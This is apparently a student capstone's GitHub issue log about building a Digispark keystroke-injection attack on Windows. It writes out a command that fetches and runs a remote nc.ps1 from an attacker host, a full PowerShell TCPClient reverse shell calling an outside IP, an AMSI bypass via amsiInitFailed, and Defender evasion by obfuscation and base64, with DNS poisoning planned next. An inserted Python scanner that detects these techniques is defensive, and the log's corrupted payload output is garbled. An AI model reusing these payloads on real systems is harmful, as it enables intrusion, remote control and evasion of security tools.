Closed serate-actual closed 2 years ago
Lv. 0: Netcat/telnet shell
Lv. 1: Web Shell See: https://hacksland.net/build-a-simple-web-shell/
https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
Okay, hear me out. A netcat shell REQUIRES I know an IP of an attacker box. What if I couple this with a DNS poisoning attack? I.e. I open netcat to mydomain.net, but mydomain.net is DNS poisoned to my attack box. I could easily create the "dumb" netcat script, and then create the SMART netcat script.
Okay, netcat isn't default on Windows. Help.
Solution 1 - wget/curl/equivalent nc.exe and run it and then delete later
Solution 2 - Understand what's going on with the powershell thing here
Okay, it looks like a blend of solution 1 & solution 2 is what I will use. Currently, the attack path looks like:
powershell -exec bypass -f http://attackerbox.com/nc.ps1
Currently setting up a script for Kali to set up a web server.
https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3 maybe helpful for netcat reverse shell
Okay, I tried that netcat reverse shell. Bravo Windows Defender, you blocked it.
https://github.com/danielbohannon/Invoke-Obfuscation
I'm gonna try this tool now.
Okay, obfuscation module is broken - however, I demo'd it with Windows Defender DISABLED.
https://pentestlaboratories.com/tag/obfuscation/
Probably going to try base64 encoded just to get it done.
This works to bypass Windows Defender by bypassing AMSI (basically the utility that scans for malicious code), by setting the amsiInitFailed flag to prevent AMSI from running.
From Fabian Mosch
Okay, so the one-liner for netcat is broken??
IT SHOULD print like this:
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
HOWEVER THIS happens:
-ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); $client = New-Object System.Net.Sockets.TCPClient("192.168.50.44,4444");$stream = $client.GetStream();[byte[]]$bytes = ))\
-ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); $client = New-Object System.Net.Sockets.TCPClient("192.168.50.44,4444");$stream = $client.GetStream();[byte[]]$bytes = *b
It kinda dies at the bytes = section. It looks like it's not affected by the syntax. I am going to see how much lorem ipsum my Digispark can print before having an error.
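Added here as a defender-side counterpart to the steps above (example code, not part of this project): a small Python scanner that checks PowerShell command lines or script block log text for the pieces this log relies on (`-exec bypass`, `amsiInitFailed`, the `TCPClient` one-liner, `iex`, a remote script fetch), and also decodes `-EncodedCommand` base64 so the "just base64 encode it" step does not hide them. The sample log lines, host names and indicator names are constructed.

```python
import base64
import re

# Case-insensitive indicators for the techniques this log walks through: execution-policy
# bypass, AMSI bypass via amsiInitFailed, the TCPClient reverse shell, iex, and remote fetch.
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-(exec|ep|executionpolicy)\s+bypass", re.I),
    "amsi_init_failed": re.compile(r"amsiInitFailed", re.I),
    "tcp_client_socket": re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    "invoke_expression": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "remote_script_fetch": re.compile(
        r"(DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b)\s*\(?.*https?://", re.I),
}
_ENCODED = re.compile(r"-(encodedcommand|enc|ec)\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_encoded(text: str) -> str:
    """Append the decoded UTF-16LE payload of any -EncodedCommand argument, so indicators
    hidden behind base64 (the 'just base64 encode it' step) are still inspected."""
    decoded = []
    for m in _ENCODED.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(2)).decode("utf-16-le", errors="replace"))
        except ValueError:
            pass  # not valid base64: leave the raw text for the plain-text checks
    return "\n".join([text, *decoded])


def scan_line(line: str) -> list:
    """Names of all indicators that fire on one command line / script block, sorted."""
    expanded = expand_encoded(line)
    return sorted(name for name, pat in INDICATORS.items() if pat.search(expanded))


def scan_log(lines) -> list:
    """[(line_no, hits)] for every line that trips at least one indicator."""
    return [(i, hits) for i, raw in enumerate(lines, 1) if (hits := scan_line(raw))]


# Constructed sample telemetry (command lines / event 4104 ScriptBlockText), not real captures.
_ENC_SAMPLE = base64.b64encode(
    'IEX (iwr http://attackerbox.example/nc.ps1)'.encode("utf-16-le")).decode()
SAMPLE_LOG = [
    'powershell -exec bypass -f http://attackerbox.com/nc.ps1',
    '$f = "amsiInitFailed"  # constructed fragment, not a working bypass',
    '$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream()',
    'powershell -enc ' + _ENC_SAMPLE,
    'Get-ChildItem C:\\Users | Sort-Object Length',
]
```

Running `scan_log(SAMPLE_LOG)` flags the first four constructed lines and leaves the plain `Get-ChildItem` line alone; the base64 line is caught only because the encoded payload is decoded first.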
Okay, the lorem ipsum test was very . . . enlightening. It compiles and uploads, but DOESN'T do anything with a certain amount of text (like 2-3 lines of lorem ipsum). HOWEVER, it does really well with just printing repeated text (probably something to do with memory). This probably also explains the corruption at the end of it, due to some memory issues.
510 characters = Arduino has a bad time
313 characters = happy Arduino
It's not 255 or 512 . . . HELP, WHY DOESN'T IT MAKE SENSE
I guess I'll have to curl literally everything and pass it directly to PowerShell, which works.
Time to figure out dns poisoning :)
https://null-byte.wonderhowto.com/how-to/tutorial-dns-spoofing-0167796/
Okay, here goes the rough idea of my attack.
Making a Python script.
Python script finished - at https://github.com/SirSertile/CNCS-Capstone/tree/main/Design%20Files/Rubber%20Ducky/PythonScript
SSH sessions
Web Shells
Maybe display a Metasploitable shell? This would be really cool but also a HUGE reach.